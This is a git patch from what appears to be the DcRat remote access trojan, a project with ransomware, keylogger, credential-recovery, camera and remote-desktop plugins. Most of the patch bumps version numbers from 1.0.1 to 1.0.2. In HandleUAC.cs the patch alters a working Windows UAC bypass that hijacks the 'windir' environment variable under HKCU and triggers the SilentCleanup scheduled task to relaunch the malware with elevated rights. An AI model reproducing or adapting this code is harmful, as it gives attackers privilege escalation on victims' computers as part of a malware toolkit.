From eb171aaa9f304b478807efcb19209c7ffa6bbf0d Mon Sep 17 00:00:00 2001 From: qwqdanchun <287182701@qq.com> Date: Thu, 18 Mar 2021 22:52:39 +0800 Subject: [PATCH] v1.0.2 --- Client/Properties/AssemblyInfo.cs | 4 ++-- Client/Settings.cs | 2 +- Client/app.manifest | 2 +- MessagePack/Properties/AssemblyInfo.cs | 4 ++-- Plugin/Audio/Audio/Properties/AssemblyInfo.cs | 4 ++-- Plugin/Chat/Chat/Properties/AssemblyInfo.cs | 4 ++-- Plugin/Decrypter/Decrypter/Properties/AssemblyInfo.cs | 4 ++-- Plugin/Extra/Extra/Properties/AssemblyInfo.cs | 4 ++-- .../FileManager/FileManager/Properties/AssemblyInfo.cs | 4 ++-- .../FileSearcher/Properties/AssemblyInfo.cs | 4 ++-- .../Information/Information/Properties/AssemblyInfo.cs | 4 ++-- Plugin/Logger/Logger/Properties/AssemblyInfo.cs | 4 ++-- .../Miscellaneous/Properties/AssemblyInfo.cs | 4 ++-- Plugin/Options/Options/Handler/HandleUAC.cs | 10 +++------- Plugin/Options/Options/Properties/AssemblyInfo.cs | 4 ++-- .../ProcessManager/Properties/AssemblyInfo.cs | 4 ++-- .../Ransomware/Ransomware/Properties/AssemblyInfo.cs | 4 ++-- Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs | 4 ++-- .../RemoteCamera/Properties/AssemblyInfo.cs | 4 ++-- .../RemoteDesktop/Properties/AssemblyInfo.cs | 4 ++-- Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs | 4 ++-- .../SendMemory/SendMemory/Properties/AssemblyInfo.cs | 4 ++-- Server/Properties/AssemblyInfo.cs | 4 ++-- Server/Settings.cs | 2 +- Server/app.manifest | 2 +- 25 files changed, 47 insertions(+), 51 deletions(-) diff --git a/Client/Properties/AssemblyInfo.cs b/Client/Properties/AssemblyInfo.cs index aeae3ac..a658ebb 100644 --- a/Client/Properties/AssemblyInfo.cs +++ b/Client/Properties/AssemblyInfo.cs @@ -31,5 +31,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Client/Settings.cs b/Client/Settings.cs index 87dd5a7..a1b7cb4 100644 --- a/Client/Settings.cs +++ b/Client/Settings.cs @@ -13,7 +13,7 @@ public static class Settings #if DEBUG public static string Por_ts = "8848"; public static string Hos_ts = "127.0.0.1"; - public static string Ver_sion = "1.0.1"; + public static string Ver_sion = "1.0.2"; public static string In_stall = "false"; public static string Install_Folder = "AppData"; public static string Install_File = "Test.exe"; diff --git a/Client/app.manifest b/Client/app.manifest index 36d1d3e..12bc47e 100644 --- a/Client/app.manifest +++ b/Client/app.manifest @@ -1,6 +1,6 @@  - + diff --git a/MessagePack/Properties/AssemblyInfo.cs b/MessagePack/Properties/AssemblyInfo.cs index aeae3ac..a658ebb 100644 --- a/MessagePack/Properties/AssemblyInfo.cs +++ b/MessagePack/Properties/AssemblyInfo.cs @@ -31,5 +31,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Audio/Audio/Properties/AssemblyInfo.cs b/Plugin/Audio/Audio/Properties/AssemblyInfo.cs index 9cd4d95..1a13053 100644 --- a/Plugin/Audio/Audio/Properties/AssemblyInfo.cs +++ b/Plugin/Audio/Audio/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Chat/Chat/Properties/AssemblyInfo.cs b/Plugin/Chat/Chat/Properties/AssemblyInfo.cs index d436cfd..4879906 100644 --- a/Plugin/Chat/Chat/Properties/AssemblyInfo.cs +++ b/Plugin/Chat/Chat/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Decrypter/Decrypter/Properties/AssemblyInfo.cs b/Plugin/Decrypter/Decrypter/Properties/AssemblyInfo.cs index b1ffe26..66c0685 100644 --- a/Plugin/Decrypter/Decrypter/Properties/AssemblyInfo.cs +++ b/Plugin/Decrypter/Decrypter/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 //通过使用 "*",如下所示: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Extra/Extra/Properties/AssemblyInfo.cs b/Plugin/Extra/Extra/Properties/AssemblyInfo.cs index 225f0e0..b2a2c22 100644 --- a/Plugin/Extra/Extra/Properties/AssemblyInfo.cs +++ b/Plugin/Extra/Extra/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs b/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs index b40475b..2d229b2 100644 --- a/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs +++ b/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/FileSearcher/FileSearcher/Properties/AssemblyInfo.cs b/Plugin/FileSearcher/FileSearcher/Properties/AssemblyInfo.cs index aeae3ac..a658ebb 100644 --- a/Plugin/FileSearcher/FileSearcher/Properties/AssemblyInfo.cs +++ b/Plugin/FileSearcher/FileSearcher/Properties/AssemblyInfo.cs @@ -31,5 +31,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Information/Information/Properties/AssemblyInfo.cs b/Plugin/Information/Information/Properties/AssemblyInfo.cs index 204072a..d463ef6 100644 --- a/Plugin/Information/Information/Properties/AssemblyInfo.cs +++ b/Plugin/Information/Information/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Logger/Logger/Properties/AssemblyInfo.cs b/Plugin/Logger/Logger/Properties/AssemblyInfo.cs index eae6fc0..e26c329 100644 --- a/Plugin/Logger/Logger/Properties/AssemblyInfo.cs +++ b/Plugin/Logger/Logger/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Miscellaneous/Miscellaneous/Properties/AssemblyInfo.cs b/Plugin/Miscellaneous/Miscellaneous/Properties/AssemblyInfo.cs index 3300d8f..2c0493b 100644 --- a/Plugin/Miscellaneous/Miscellaneous/Properties/AssemblyInfo.cs +++ b/Plugin/Miscellaneous/Miscellaneous/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Options/Options/Handler/HandleUAC.cs b/Plugin/Options/Options/Handler/HandleUAC.cs index 71f997d..a48b98a 100644 --- a/Plugin/Options/Options/Handler/HandleUAC.cs +++ b/Plugin/Options/Options/Handler/HandleUAC.cs @@ -51,18 +51,14 @@ public HandleUACbypass() Microsoft.Win32.RegistryKey key; key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Environment"); key.SetValue("windir", @"cmd.exe " + @"/k START " + Process.GetCurrentProcess().MainModule.FileName + " & EXIT"); - - Thread.Sleep(500); + key.Close(); Process process = new Process(); process.StartInfo.FileName = "schtasks.exe"; process.StartInfo.Arguments = "/run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I"; process.Start(); - - Thread.Sleep(500); - - key.DeleteValue("windir"); - key.Close(); + + Methods.ClientExit(); Environment.Exit(0); } catch{} diff --git a/Plugin/Options/Options/Properties/AssemblyInfo.cs b/Plugin/Options/Options/Properties/AssemblyInfo.cs index 204072a..d463ef6 100644 --- a/Plugin/Options/Options/Properties/AssemblyInfo.cs +++ b/Plugin/Options/Options/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/ProcessManager/ProcessManager/Properties/AssemblyInfo.cs b/Plugin/ProcessManager/ProcessManager/Properties/AssemblyInfo.cs index 9cd4d95..1a13053 100644 --- a/Plugin/ProcessManager/ProcessManager/Properties/AssemblyInfo.cs +++ b/Plugin/ProcessManager/ProcessManager/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Ransomware/Ransomware/Properties/AssemblyInfo.cs b/Plugin/Ransomware/Ransomware/Properties/AssemblyInfo.cs index faeb730..504b3f7 100644 --- a/Plugin/Ransomware/Ransomware/Properties/AssemblyInfo.cs +++ b/Plugin/Ransomware/Ransomware/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs b/Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs index 7b1a30a..92fa9ed 100644 --- a/Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs +++ b/Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/RemoteCamera/RemoteCamera/Properties/AssemblyInfo.cs b/Plugin/RemoteCamera/RemoteCamera/Properties/AssemblyInfo.cs index e012b7b..418870c 100644 --- a/Plugin/RemoteCamera/RemoteCamera/Properties/AssemblyInfo.cs +++ b/Plugin/RemoteCamera/RemoteCamera/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/RemoteDesktop/RemoteDesktop/Properties/AssemblyInfo.cs b/Plugin/RemoteDesktop/RemoteDesktop/Properties/AssemblyInfo.cs index d2b6e7c..48e302a 100644 --- a/Plugin/RemoteDesktop/RemoteDesktop/Properties/AssemblyInfo.cs +++ b/Plugin/RemoteDesktop/RemoteDesktop/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs b/Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs index faeb730..504b3f7 100644 --- a/Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs +++ b/Plugin/SendFile/SendFile/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Plugin/SendMemory/SendMemory/Properties/AssemblyInfo.cs b/Plugin/SendMemory/SendMemory/Properties/AssemblyInfo.cs index aeae3ac..a658ebb 100644 --- a/Plugin/SendMemory/SendMemory/Properties/AssemblyInfo.cs +++ b/Plugin/SendMemory/SendMemory/Properties/AssemblyInfo.cs @@ -31,5 +31,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Server/Properties/AssemblyInfo.cs b/Server/Properties/AssemblyInfo.cs index 2a93f71..8613035 100644 --- a/Server/Properties/AssemblyInfo.cs +++ b/Server/Properties/AssemblyInfo.cs @@ -32,5 +32,5 @@ // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] -[assembly: AssemblyVersion("1.0.1.0")] -[assembly: AssemblyFileVersion("1.0.1.0")] +[assembly: AssemblyVersion("1.0.2.0")] +[assembly: AssemblyFileVersion("1.0.2.0")] diff --git a/Server/Settings.cs b/Server/Settings.cs index f7c70ef..16f34b5 100644 --- a/Server/Settings.cs +++ b/Server/Settings.cs @@ -19,7 +19,7 @@ public static class Settings public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; public static X509Certificate2 ServerCertificate; - public static readonly string Version = "DcRat 1.0.1"; + public static readonly string Version = "DcRat 1.0.2"; public static object LockListviewClients = new object(); public static object LockListviewLogs = new object(); public static object LockListviewThumb = new object(); diff --git a/Server/app.manifest b/Server/app.manifest index 1cb88de..d5cf055 100644 --- a/Server/app.manifest +++ b/Server/app.manifest @@ -1,6 +1,6 @@  - +